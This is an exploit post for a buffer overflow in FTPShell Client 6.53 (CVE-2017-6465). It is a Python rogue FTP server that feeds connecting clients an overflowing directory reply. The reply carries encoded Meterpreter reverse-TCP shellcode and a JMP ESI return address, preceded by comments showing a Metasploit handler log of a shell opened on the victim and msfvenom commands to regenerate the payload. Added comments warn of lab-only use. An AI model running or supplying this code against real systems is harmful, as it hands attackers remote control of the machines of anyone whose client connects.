FTPShell Client 6.53 Buffer Overflow
Posted on 15 March 2017
#!/usr/bin/python #FTPShell Client 6.53 buffer overflow #By N_A , N_A[at]tutanota.com #Tested on Windows 7 Professional #Credit to Peter Baris for finding the vulnerability and also submitting the CVE and public exploit. #CVE: CVE-2017-6465 #Vendor Homepage: http://www.saptech-erp.com.au #Tested on: #Microsoft Windows 7 Professional #6.1.7601 Service Pack 1 Build 7601 #x64 #Some shout outz: #Burglekutt_Saunders - That Snapchat big mouth filter thing. Shit looks crazy af brother! #Beavdini - Out there in Bulgaria getting %100 percents on everything apart from coolness. Who knows..i might drop by sometime ;) #Z3yy3n - Fathergodding it are we soon? Havent had one for ages vato #Nuri - Happy Birthday :) #Anya - Rabbits are brave , run rabbit run :) #Y@hya - Purple eyed dude. Lets shave our heads brother #Baby_Melv1n - Thanks for being epically round. # msf > use exploit/multi/handler # msf exploit(handler) > set payload windows/meterpreter/reverse_tcp # payload => windows/meterpreter/reverse_tcp # msf exploit(handler) > set lhost 192.1.168.1 # lhost => 192.168.1.1 # msf exploit(handler) > set lport 443 # lport => 443 # msf exploit(handler) > exploit # [*] Started reverse TCP handler on 192.168.1.1:443 # [*] Starting the payload handler... #[*] Sending stage (957999 bytes) to 192.168.1.5 #[*] Meterpreter session 1 opened (192.168.1.1:443 -> 192.168.1.5:49237) at 2017-03-14 17:00:35 +0000 #meterpreter > shell #Process 3672 created. #Channel 1 created. #Microsoft Windows [Version 6.1.7601] #Copyright (c) 2009 Microsoft Corporation. All rights reserved. 
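# C:\Program Files\FTPShell Client>
#
# --- exploit -----------------------------------------------------------------
# Flow: FTPShell Client connects to this rogue FTP daemon, "logs in" (any
# credentials are accepted), and the reply to its next command carries a
# 400-byte overflow inside the quoted directory name, followed by the address
# of a JMP ESI gadget that lands execution on our NOP sled.
#
# Lab use only: the daemon binds 0.0.0.0, so anything that can reach this
# host is served the payload. Bind to an isolated interface if in doubt.

import socket
import sys

# Port the rogue FTP daemon listens on; point FTPShell Client at this host:port.
port = 21

# Number of controlled bytes that precede the saved return address.
# Exploitation requires a buffer of exactly 400 bytes; from there on EIP is
# overwritten and ESI contains our buffer.
OVERFLOW_LEN = 400

# Regenerate this payload yourself -- it is opaque machine code, and the copy
# below calls back to whatever LHOST the author baked in, so it is both
# untrustworthy and useless as shipped. Replace LHOST with your own IP:
#   msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=443 \
#       EXITFUNC=thread -a x86 --platform Windows \
#       -b "\x00\x0a\x0d\x5c\x22\x27" -f python -e x86/shikata_ga_nai
# Bad characters, presumably dictated by the framing: \x00 (C string end),
# \x0a \x0d (FTP reply line end), and \x22 \x27 \x5c because the buffer sits
# inside a quoted path in the reply.
# Payload size: 381 bytes. A regenerated payload of another length is fine:
# the padding is computed from len(buf) so the total stays OVERFLOW_LEN.
buf = b""
buf += b"\xdb\xdf\xd9\x74\x24\xf4\x5e\x29\xc9\xbf\xa5\x89\x6c"
buf += b"\xf6\xb1\x59\x31\x7e\x19\x03\x7e\x19\x83\xc6\x04\x47"
buf += b"\x7c\x90\x1e\x05\x7f\x69\xdf\x69\x09\x8c\xee\xa9\x6d"
buf += b"\xc4\x41\x19\xe5\x88\x6d\xd2\xab\x38\xe5\x96\x63\x4e"
buf += b"\x4e\x1c\x52\x61\x4f\x0c\xa6\xe0\xd3\x4e\xfb\xc2\xea"
buf += b"\x81\x0e\x02\x2a\xff\xe3\x56\xe3\x74\x51\x47\x80\xc0"
buf += b"\x6a\xec\xda\xc5\xea\x11\xaa\xe4\xdb\x87\xa0\xbf\xfb"
buf += b"\x26\x64\xb4\xb5\x30\x69\xf0\x0c\xca\x59\x8f\x8e\x1a"
buf += b"\x90\x70\x3c\x63\x1c\x83\x3c\xa3\x9b\x7b\x4b\xdd\xdf"
buf += b"\x06\x4c\x1a\x9d\xdc\xd9\xb9\x05\x97\x7a\x66\xb7\x74"
buf += b"\x1c\xed\xbb\x31\x6a\xa9\xdf\xc4\xbf\xc1\xe4\x4d\x3e"
buf += b"\x06\x6d\x15\x65\x82\x35\xce\x04\x93\x93\xa1\x39\xc3"
buf += b"\x7b\x1e\x9c\x8f\x96\x4b\xad\xcd\xfe\xb8\x9c\xed\xfe"
buf += b"\xd6\x97\x9e\xcc\x79\x0c\x09\x7d\xf2\x8a\xce\x82\x29"
buf += b"\x6a\x40\x7d\xd1\x8b\x48\xba\x85\xdb\xe2\x6b\xa5\xb7"
buf += b"\xf2\x94\x70\x2d\xf6\x02\x70\xb9\xf8\xa5\xec\xbf\xf8"
buf += b"\x48\x57\x36\x1e\x1a\xf7\x19\x8f\xdb\xa7\xd9\x7f\xb4"
buf += b"\xad\xd5\xa0\xa4\xce\x3f\xc9\x4f\x20\x96\xa1\xe7\xd9"
buf += b"\xb3\x3a\x99\x26\x6e\x47\x99\xac\x9b\xb7\x54\x44\xe9"
buf += b"\xab\x81\x35\x11\x34\x52\xdf\x11\x5e\x56\x49\x45\xf6"
buf += b"\x54\xac\xa1\x59\xa6\x9b\xb1\x9e\x58\x5d\x80\xd5\x6f"
buf += b"\xcb\xac\x81\x8f\x1b\x2d\x52\xc6\x71\x2d\x3a\xbe\x21"
buf += b"\x7e\x5f\xc1\xfc\x12\xcc\x54\xfe\x42\xa0\xff\x96\x68"
buf += b"\x9f\xc8\x39\x92\xca\x4a\x3d\x6c\x88\x6e\xe5\x05\x72"
buf += b"\x2f\x15\xd6\x18\xaf\x45\xbe\xd7\x80\x6a\x0e\x17\x0b"
buf += b"\x23\x06\x92\xda\x86\xb7\xa3\xf6\x46\x66\xa3\xf5\x52"
buf += b"\x7f\x2a\xf9\x65\x80\xcc\xc6\xb0\xb9\xba\x0f\x01\xfe"
buf += b"\xa5\x8d\xaf\x0b\x4e\x08\x3a\xb6\x13\xab\x91\xf5\x2d"
buf += b"\x28\x13\x86\xc9\x30\x56\x83\x96\xf6\x8b\xf9\x87\x92"
buf += b"\xab\xae\xa8\xb6"

# 0x004B95DC -> JMP ESI ; RETN in FtpShell.exe. ESI holds our buffer, so the
# jump lands on the NOP sled below. The gadget sits in the main executable at
# its default base, which can only work if FtpShell.exe is loaded at a fixed
# base (no ASLR relocation) -- presumably true on the tested Windows 7 SP1
# build; re-verify the address on anything else.
# Only three bytes are sent: the high byte 0x00 is a bad character, but since
# eip is the last thing in the buffer the target's own string terminator
# supplies it. Nothing may ever be appended after eip.
eip = b"\xDC\x95\x4B"

# NOP sled the JMP ESI lands on before reaching the shellcode.
nops = b"\x90" * 10


def build_overflow(shellcode, sled=nops, ret=eip, total=OVERFLOW_LEN):
    """Assemble ``sled + shellcode + padding + ret`` for the overflow.

    Args:
        shellcode: encoded payload bytes, free of the bad characters above.
        sled: NOP sled placed first (where JMP ESI lands).
        ret: little-endian return address, appended last.
        total: number of bytes that must precede the saved return address.

    Returns:
        bytes of length ``total + len(ret)``.

    Raises:
        ValueError: if sled + shellcode already exceed ``total``. The original
        hard-coded 9 bytes of padding; computing it instead keeps the buffer
        correct for a regenerated payload, and failing loudly beats silently
        emitting a buffer that no longer reaches EIP.
    """
    body_len = len(sled) + len(shellcode)
    if body_len > total:
        raise ValueError("sled + shellcode is %d bytes, must be <= %d"
                         % (body_len, total))
    padding = b"A" * (total - body_len)
    return sled + shellcode + padding + ret


# 10 NOPs + 381-byte payload + 9 bytes of padding = 400, then the 3-byte EIP.
exploit_buffer = build_overflow(buf)


def serve(listen_port, payload):
    """Run the fake FTP daemon forever, handling one client at a time.

    Each client gets a banner, is accepted whatever it sends as USER/PASS,
    and the reply to its next command carries ``payload`` inside the quoted
    directory name. Exits the process if the listening port cannot be bound
    (the original fell through to accept() on the unbound socket).
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Let the script be restarted right after a previous run without waiting
    # for the old socket to leave TIME_WAIT.
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        s.bind(("0.0.0.0", listen_port))
        s.listen(5)
    except socket.error as e:
        print("[*] Failed to bind the server to port %d: %s" % (listen_port, e))
        sys.exit(1)
    print(" [*]FTPShell Client 6.53 buffer overflow[*]")
    print("[*] By N_A [*]")
    print(" [*]Fake FTP Daemon started[*] ")
    print("[*]Awaiting for victim to connect[*] ")
    while True:
        conn, addr = s.accept()
        print("[*] Connection from %s:%d" % addr)
        try:
            # FTP replies are CRLF-terminated (RFC 959); without the line end
            # the client never sees a complete reply.
            conn.send(b"220 GutenTag Vater\r\n")
            print(conn.recv(1024))   # USER ...
            conn.send(b"331 OK\r\n")
            print(conn.recv(1024))   # PASS ...
            conn.send(b"230 OK\r\n")
            print(conn.recv(1024))   # client's next command (PWD-style reply follows)
            # A real directory reply would be code 257; 220 is what the
            # original exploit sends and the client evidently accepts it.
            conn.send(b'220 "' + payload + b'" is current directory\r\n')
            print("[*]Evil buffer sent. g0t sh3ll?[*] ")
        finally:
            # The original never closed client sockets.
            conn.close()


if __name__ == "__main__":
    serve(port, exploit_buffer)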